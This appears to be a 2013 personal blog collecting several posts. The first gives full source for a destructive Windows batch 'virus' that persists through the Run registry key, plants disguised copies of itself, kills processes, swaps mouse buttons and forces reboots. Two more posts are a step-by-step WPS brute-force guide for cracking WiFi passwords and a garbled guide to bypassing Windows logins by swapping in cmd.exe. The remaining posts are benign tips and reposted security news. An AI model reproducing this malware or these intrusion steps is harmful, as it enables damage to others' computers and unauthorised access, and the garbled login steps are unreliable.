Sunday, November 10, 2013

Learn How To Make A Dangerous Virus Using Notepad.

This time i am going to tell you, how to build virus on notepad.

This Virus can do:

1. Copy itself into startup
2. Copy itself over one thousand times into random spots in your computer
3. Hide its self created files
4. Task kill MSN, Norton, Windows Explorer, Limewire.
5. Swap the left mouse button with the right one
6. Opens alert boxes
7. Changes the time to 12:00 and shuts down the computer
 
 
 
 
and many more.

Now follow the steps given below

Step 1 >> Open Notepad.
Step 2 >> Copy This Code ..

Code(below line) :--

------------------------------------------------------------------------------------------------
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
-------------------------------------------------------------------------------------------------------------
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

Thursday, November 7, 2013

Hack WIFI password with Ubuntu (WPA/WPA2)

In this tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS; Which is Wireless Protected Setup : this type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router’s PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as: You can always have the Wireless Password even if It’s changed by knowing the PIN number.

How To Hack WPA/WPA2 Passwords using Ubuntu (Reaver)

Step 1 (Setting up Reaver 1.4 )

1) Open terminal and type: sudo -s and type your password.
2) Download
(Better Download the Latest Version ) Placed in a specified folder.
3) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
4) Install dependencies: sudo apt-get install libpcap-dev
then : sudo apt-get install libsqlite3-dev
Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.
4) Enter the folder by typing : cd reaver-1.4/src
5) Type: ./configure
6) Type : make
7) Type : make install


To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s sub commands.


Step 2 ( Hacking WPA/WPA2 Wireless)

After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.
Requirements:
Install aircrack-ng by typing sudo apt-get install aircrack-ng
Airodump-ng / Airmon-ng commands
Reaver 1.4 (Install in Step 1)
1) We need to have the wireless BSSID (Mac address) so we use airodump-ng :
Open a terminal and Type : airmon-ng start wlan0
Type : airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:22:33:44:55 )
2) Starting the attack:
Type: reaver -i mon0 -b 00:11:22:33:44:55
Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.
Note: You can use walsh -i mon0 to scan for vulnerable Access Points
Screenshot:
learn2crack.com

Thursday, October 31, 2013

How to hack Window

Method 1 of 2: Hack from the Start Screen
  1. When the computer starts up, hold down F8 before you see the "Windows Starting" screen. This will bring you to a screen with choices. Your best bet will be "Safe Mode with Command Prompt". You can then do as you want.

2. Go down to the bottom and select "All Files".
3. Name the file: Batch.bat.
4. Go to where you saved the file, and open it. This will open up Command Prompt.
5. If the computer has Notepad blocked, you can use edit. Access this by opening command prompt or command.com and typing edit. Also, you can even use Microsoft Office or something if you can save it right.
6. Do as you wish inside command prompt. Here is how to add or delete accounts:
 
             Add Account: C:>net user USERNAME /add
  • Change Accounts password: C:>net user USERNAME * then you'll be able to enter a new password for the account. If you just press enter without typing anything, the account password will be reset.
  • Delete Account: C:>net local group Administrators# # Another way is to open up notepad, (if it's not blocked), and type in "command.com". Then go to File->Save As. A USERNAME /ADD
 

EdiMethod 2 of 2: Hack from the Windows 7 CD

  1. 1
    Boot the system from the Windows 7 CD.

  2. 2
    Click on Next.

  3. 3
    Choose “Repair your computer”.

  4. 4
    Click Next in the System Recovery window.

  5. 5
    Choose the Command Prompt option below.

  6. 6
    In the command prompt window, copy the Seth file to C drive. Enter this command: “C:\windows\system32\Seth.exe c:” (without quotation marks).

  7. 7
    Replace the Seth.exe file with cmd.exe file with following command, and type “yes” to replace the file: "c:\windows\system32\cmd.exe c:\windows\syetem32\Seth.exe" (without quotation marks).

  8. 8
    Type "exit” to restart the Windows setup.

  9. 9
    Press the shift key 5 times, rapidly, when you're in the username screen. In the Sticky Keys window, click Yes.

  10. 10
    In the command prompt window type the “net user,” “user name” and “password”. For example: net user administrator 123

10 Command Prompt Tricks and Hacks

Command Prompt Tricks, Hacks, and Secrets in Windows 7, 8, Vista, and XP


The Windows Command Prompt tool, and many of its commands, might seem boring or even relatively useless at first glance, but as anyone who has ever used the Command Prompt very often can tell you, there's much to love!
Below are several Command Prompt tricks and other Command Prompt hacks that I guarantee will get you excited about many of the mundane sounding Command Prompt commands like telnet, tree, or robocopy... okay, robocopy sounds pretty cool.
Some of these Command Prompt tricks and hacks are special features or uses of the Command Prompt itself, while others are just neat or relatively unknown things you can do with certain commands. Enjoy!

1. Use Ctrl-C to Abort a Command

Ctrl-C - Command Prompt Tricks
Just about any command can be stopped in its tracks with the abort command: Ctrl-C.
If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.
Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know.
 
2. View a Command's Results One Page (or Line) at a Time
More Command - Command Prompt Tricks
Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone.
One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time.
To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.
For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.
Just press the space bar to advance by page or press the Enter key to advance one line at a time.
See Command Prompt Trick #7 below for a different solution to this problem.

3. Run Command Prompt as an Administrator Automatically

Command Prompt Admin Shortcut - Command Prompt Tricks
Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.
You can always right-click on any Command Prompt shortcut and choose Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.
To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on the Shortcut tab.

4. Become a Command Prompt Power User with Function Keys

Command Prompt Function Keys - Command Prompt Tricks
The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:
F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste
Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.

5. Hack the Prompt Text

Prompt Command - Command Prompt Tricks
Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable.
Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it.
One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter.
You can always execute prompt alone, without options, to return it to its sometimes boring default.

6. Get Help for Any Command

Help Switch - Command Prompt Tricks
Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.
I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.
Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.

7. Save a Command's Output to a File

Command Output - Command Prompt Tricks
An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators.
These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window.
For example, let's say you're about to post a computer problem to an online forum and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.
For example, you might execute systeminfo > c:\mycomputerinfo.txt to save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.
See How To Redirect Command Output to a File for more examples and a better explanation of how to use redirection operators.

8. View Your Hard Drive's Entire Directory Structure

Directory Structure with Tree Command - Command Prompt Tricks
I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories.
Execute tree from any directory to see the folder structure under that directory.
Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.
Ads
Password Recovery Softwarewww.StellarInfo.co.inCall Stellar Data Recovery To Get Back Lost Data. Free Consultation
Photo Shop: Registerwww.Shiksha.com/Photo+Shop+TrainingFind Top Training Academy in India. Get info on Courses,Admission,Fees.

9. Customize the Command Prompt Title Bar Text

Command Prompt Title Bar - Command Prompt Tricks
Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.
For example, let's say your name is Suhan Gorya, and you want to express your ownership of the Command Prompt: execute title Property of Suhan Gorya and the Command Prompt's title bar will change immediately.
The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.
The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!

10. Copy From the Command Prompt

Mark Feature in Command Prompt - Command Prompt Tricks
As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy.
But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.
Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.


Enjoy your choice..

Suhan Gorya

Tuesday, October 15, 2013

Hackers Head on Internet appliances

Suhan Gorya


From a command center in a non-descript high-rise here in the heart of Silicon Valley, security start-up Norse has been gathering shocking evidence of hackers usurping control of Internet-connected appliances, everything from web cams to climate-control systems.

This latest expansion of cybercrime revolves around the IP address assigned to each computing device connected to the Internet. Cybercriminals have begun capitalizing on the fact that many of the mundane digital devices we tie into the web are easy to locate and wide open to hacking.

"There's only one way onto the Internet, and that's through an IP address," says Norse CEO Sam Glines. "The adversary just wants IP space to launch attacks and doesn't really care if it's a baby monitor or a server at a Fortune 1000 company."

The bad guys are using automated programs to scan ranges of IP addresses for signs of vulnerable appliances. It's often a simple matter to take control by installing a few lines of malicious coding.
Norse has devised innovative technology for monitoring such cyberattacks in real time. A tiny sampling of its data, extracted exclusively for CyberTruth, revealed 724 infected appliances actively carrying out fraudulent tasks.
The corrupted appliances included firewalls, routers, modems, printers, DVRs, surveillance cams, web cams, IP cameras, VPN appliances, VOIP phone systems, FM radio transmitters, storage drives, video conferencing systems and climate-control modules. One of the big things these corrupted devices are being used for: payment card fraud.
"We are seeing credit card transactions from baby monitors, DVRs, TVs, printers, medical devices, you name it," says Tommy Stiansen, Norse founder and chief technology officer. "It's coming from all types of industries and from homes."
In a stunning demonstration, Stiansen clicked to the IP address for an activated ABS MegaCam, widely sold as a $220 baby monitor. The device was activated on the Internet by a resident of Glendale, Calif., who uses Charter Communications as an ISP.
Malicious software embedded on the web cam's Linux operating system causes a live cam view of the homeowner's living room to appear in the browser of anyone who clicks to the web cam's IP address. During Stiansen's demo, a woman and then a man enter the room and sit on a couch.
The bad guy who embedded the malware on the baby monitor probably doesn't care much about snooping; the web cam's computing power, instead, is being used to locate similar devices and help the attacker to control as many as 2,000 ABS MegaCams.
"This is happening at a large scale, and it's growing hugely every day," Stiansen says, "This is very powerful stuff, and the scariest part is this is only the tip of the iceberg."
There's clear logic behind methodically assembling digital appliances into niche networks, called botnets, under the control of a single operator.
Botnets have been the foundation of the cyber underground for more than a decade. Traditionally comprising infected personal and server computers, botnets are the engine that drives multibillion-dollar markets for spam, phishing, account hijacking, identity theft and denial-of-service attacks.
Norse's findings show how the advance guard of cybercriminals has begun pulling digital appliances into botnet service because, at the moment, it's easy to do so.

Norse notifies proper entities about problems. However, sheer numbers of issues make it impossible to notify everyone, says Glines. The company is working on processes to extend notifications. For the moment, there is no broad-based effort at defense, beyond what individual organizations are doing to protect themselves.
The Internet of Things has proved trivial to hack as the U.S. tech industry puts new consumer technologies on a fast track to store shelves, sometimes with meager quality control or accounting for security and privacy.
That trait is coming to the fore as the tech giants race to profit from the rising popularity of mobile devices and Internet-delivered services. Meanwhile, the cyber underground continues to mature into a smooth-running global industry that's quick to pounce on fresh opportunities.
"Competitive struggles force manufacturers into early release cycles, networks are becoming increasingly complex, and the complexity is hard to overcome," Stiansen says. "Meanwhile, hackers use social crowds to build hacker communities that allow them to move under the radar."
Stiansen grew up tinkering with computers on a Norwegian farm, which led him to a career designing air-traffic control and telecom-billing systems. After immigrating to the U.S. in 2004, Stiansen began thinking about a way to gain a real-time, bird's-eye view of the teeming world of botnet activity.
What he eventually came up with is IPViking, a globe-spanning network of millions of physical and virtual sensors — or honeypots — dispersed through 160 data centers in 40 countries. Each pot appears to be an Internet-connected web cam, router or other appliance — irresistible honey to hackers.
When an intruder tries to take control of a Norse honeypot, Norse grabs the attacker's IP address and begins an intensive counterintelligence routine. The IP address is fed into automated programs, called web crawlers, that scour the bulletin boards and chat rooms where hackers congregate for snippets of discussions tied to that IP address.
Analysts also do manual research to construct a dossier on the attacking IP. Norse delivers this intelligence to its clients, which include large financial institutions. The companies are then able to cut off communications from suspicious IP addresses and be on the lookout for derivative attacks.

US Government shutdown raises cybersecurity concerns

Suhan Gorya :
"shutdown clear the way to down network for all the secure work"

A new CyberTruth –SurveyMonkey Audience poll has found that Americans' concerns about the nation's cybersecurity are heightened with the government shutdown.
Some 62% of 538 respondents said they felt some degree of heightened concern, while 54% of survey takers indicated feeling some degree less secure with the government shutdown.
There have been plenty of headline- grabbing disclosures over the past two years of politically- motivated hackers disrupting banks and media companies and stealing data that relates to critical infrastructure.
"Citizens are right to be concerned with our nation's cyber defensive capabilities during the shutdown," says Chris Petersen, CTO and co-founder of LogRhythm, a security analytics company in Colorado. "Defending against these attacks requires highly skilled people, and many of these people are sidelined. Their posts are going unmanned and the defensive positions held are being eroded."
Survey takers were asked to select which issue about the government shutdown concerned them most. The top choice: the "potential for the government to default on its debt," cited by 26%of respondents, followed by "Congress not carrying out its daily duties," 25%; "furloughed workers not getting paid," 20%; "security threats from other entities," 12%; and "national parks and monuments being closed,: 8%.
"It is hard to predict the exact consequence the government shutdown will have when it comes to defending our nation's virtual borders," says Peterson. "Many posts are undermanned, and our defenses are down. With fewer eyes on their activities, attackers can more aggressively infiltrate further into networks, systems, and data, better able to hide their tracks in the process."
Peterson predicts that cyberspies are likely to probe and penetrate poorly monitored systems. "New beachheads will be established," he says. "Some will be used for immediate gains. Over time, some of these compromises will be detected when furloughed cyber security workers return to their posts. However, other beachheads will stay intentionally hidden, buried and dormant, waiting for the right time to strike."

Download Temple Run Game For Window PC Free.

Suhan Gorya
 
Android platform is the best platform to play games.There are lot of android games are available on internet like Arcade games,Puzzle games,Shooting games,Adventures etc.But the bad thing in these games is that,We are unable to play these games on PC.But Tricks For You always try to search these games for PC also.
And in today's article we will provide you the trick to download Temple Run Game For PC.This game is installed on PC using Bluestacks app player.

How To Download Temple Run Game For PC:

Step 1:Download the Bluestacks app player for windows From Here.
Note:The optimized version of Bluestacks is available for Windows 8 and if you are a Window 8 user then go for it else just download the bluestacks beta version.
Step 2:After downloading bluestacks app player install it on the PC.The installation takes some time as the app player fetch all the android supporting files from the web.
Step 3:Now download Temple Run from android store
 
Step 4:The download file is of .apk extension.Run the setup by using Blueslack app player and enjot the game for free.